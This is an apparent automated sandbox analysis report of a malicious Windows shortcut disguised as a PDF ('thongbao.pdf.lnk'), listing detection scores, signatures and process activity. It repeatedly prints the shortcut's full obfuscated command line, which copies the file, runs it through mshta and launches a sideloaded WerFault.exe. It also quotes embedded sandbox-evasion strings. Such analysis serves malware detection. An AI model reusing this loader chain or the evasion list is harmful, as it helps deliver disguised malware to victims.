Windows Analysis Report
p3a3TSUccX.lnk

Overview

General Information

Sample name: p3a3TSUccX.lnk
renamed because original name is a hash value
Original sample name: 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60.lnk
Analysis ID: 1500949
MD5: 54f4610b378845315fb6dbae629cd97c
SHA1: 59e38278a7f81438fe075789706a2b7e0b49184f
SHA256: 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60
Tags: lnk
Infos:

Detection

MalLnk
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
AI detected suspicious sample
Obfuscated command line found
Sigma detected: Suspicious Parent Double Extension File Execution
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: p3a3TSUccX.lnk ReversingLabs: Detection: 21%
Source: p3a3TSUccX.lnk Virustotal: Detection: 34% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 81.0% probability
Source: Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WerFault.pdb source: p3a3TSUccX.lnk
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk
Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk
Source: p3a3TSUccX.lnk String found in binary or memory: (www.facebook.com/Thich.Hoc.Chui/)Tj equals www.facebook.com (Facebook)
Source: p3a3TSUccX.lnk String found in binary or memory: /kTextE [/t (www.facebook.com/Thich.Hoc.Chui/)] equals www.facebook.com (Facebook)

System Summary
barindex
Yara detected malicious lnk
Source: Yara match File source: p3a3TSUccX.lnk, type: SAMPLE
Windows shortcut file (LNK) contains suspicious command line arguments
Source: p3a3TSUccX.lnk LNK file: $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P %USERPROFILE% /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "%USERPROFILE%\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "%USERPROFILE%\IAMHERE.alf")) && m^s^h^t^a"."exe "%USERPROFILE%\IAMHERE.alf" && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (timeout 5 && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (exit) else (start /min "" "%APPDATA%\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "%APPDATA%\Lenovo\WerFault.exe")))
Sample file is different than original file name gathered from version info
Source: p3a3TSUccX.lnk Binary or memory string: OriginalFilenameWerFault.exej% vs p3a3TSUccX.lnk
Source: p3a3TSUccX.lnk Binary string: o%XApplication Error%sInPageCoFireInPageError%s\system32\cofire.exe"%s" "%s" "%s"\Device\LanmanRedirector\%s :psapi.dllGetMappedFileNameWsfc_os.dllSfcIsFileProtectedFindFirstFileNameWFindNextFileNameWwdi.dll)n3Lgg
Source: p3a3TSUccX.lnk Binary string: \\?\GLOBALROOT\Device\Mup\0000da39a3ee5e6b4b0d3255bfef95601890afd80709%04d/%02d/%02d:%02d:%02d:%02dU:!W:dc.xpmoddatadc.xpmodminidc.xpmodmemdc.OnDemandKdmpdc.expmoddatadc.expmodminidc.expmodmemdc.CustomDumpdc.xpminidumpdc.xpmemdumpdc.noreflectdc.forcenativedumpttd.tmpNoReflectionAbandoning reflection due to server requestAttempting to reflect reporting process!Reflection/ReserveMachineQueueDirectory attempt failed: 0X%XReflection attempt failed: 0X%XFalling back to non-reflected dump for reflection requestAttempting to cross-proc reporting process!Open process failed unexpectedly: 0X%XOut of cross process pid spaceelevatednon-elevatedfullReserveMachineQueueDirectory failed: 0x%xKernelDump failed: 0x%xCollectCrossProcessModuleDumps failed: 0x%xCollectCrossProcessDumps failed: 0x%xTTD recording not allowed: 0x%xControl Time Travel Debugging failed: 0x%xCould not collect xproc for reflection: 0x%x.dmpCould not collect dump for reflection cross process: 0x%xtruefalseCollectReflectionDump failed with: 0x%xCould not collect dump for cross process: 0x%xCould not collect cross dump for loaded module %ws: 0x%xFound %u native processes for xproc module: %sFound %u x86 processes for xproc module: %sTTD\
Source: p3a3TSUccX.lnk Binary string: t\Device\IPTSYSTEM\CurrentControlSet\Control\WMI\Autologger\Microsoft-OCA-IPTBufferSize{C712AF3D-ED1E-46A9-B843-E9014D29CAEE}LogFileModeMinimumBuffersEnableKernelFlagsStatusStartapi-ms-win-eventing-controller-l1-1-0.dllStartTraceWMicrosoft-OCA-IPTWIN://SYSAPPIDonecore\shell\lib\calleridentity\calleridentity.cppN%\
Source: classification engine Classification label: mal84.troj.evad.winLNK@4/0@0/0
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\forfiles.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: p3a3TSUccX.lnk ReversingLabs: Detection: 21%
Source: p3a3TSUccX.lnk Virustotal: Detection: 34%
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" Jump to behavior
Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll Jump to behavior
Source: Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WerFault.pdb source: p3a3TSUccX.lnk
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk
Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk

Data Obfuscation
barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: p3a3TSUccX.lnk Binary or memory string: INFOWERPINITIATECRASHREPORTING WAS MEOMEO!AESCHAININGMODECBCCHAININGMODEOBJECTLENGTHTCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXECONFIRMEDCHECK SIZE: %LU BYTESMY_PAYLOAD_LENERRORFAILED TO ALLOCATE MEMORYFAILED TO SET MEMORY PROTECTION[-] SANDBOX PROCESS DETECTED![+] DECRYPTING SC...
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" $r$u$n$d$l$l$3$2 $s$he$ll$3$2$.dll $$s$h$e$l$l$e$x$e$c_r$un$d$l$l "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /p c:\users\user /s /m "thongbao.pdf.lnk" /c "cmd /c copy "@path" "c:\users\user\iamhere.alf"") else (copy "%cd%\thongbao.pdf.lnk" "c:\users\user\iamhere.alf")) && m^s^h^t^a"."exe "c:\users\user\iamhere.alf" && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (timeout 5 && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (exit) else (start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe")))else (timeout 1 && start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe")))
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500949 Sample: p3a3TSUccX.lnk Startdate: 29/08/2024 Architecture: WINDOWS Score: 84 12 Windows shortcut file (LNK) starts blacklisted processes 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 Yara detected malicious lnk 2->16 18 5 other signatures 2->18 6 cmd.exe 1 2->6         started        process3 process4 8 forfiles.exe 1 6->8         started        10 conhost.exe 1 6->10         started       
No contacted IP infos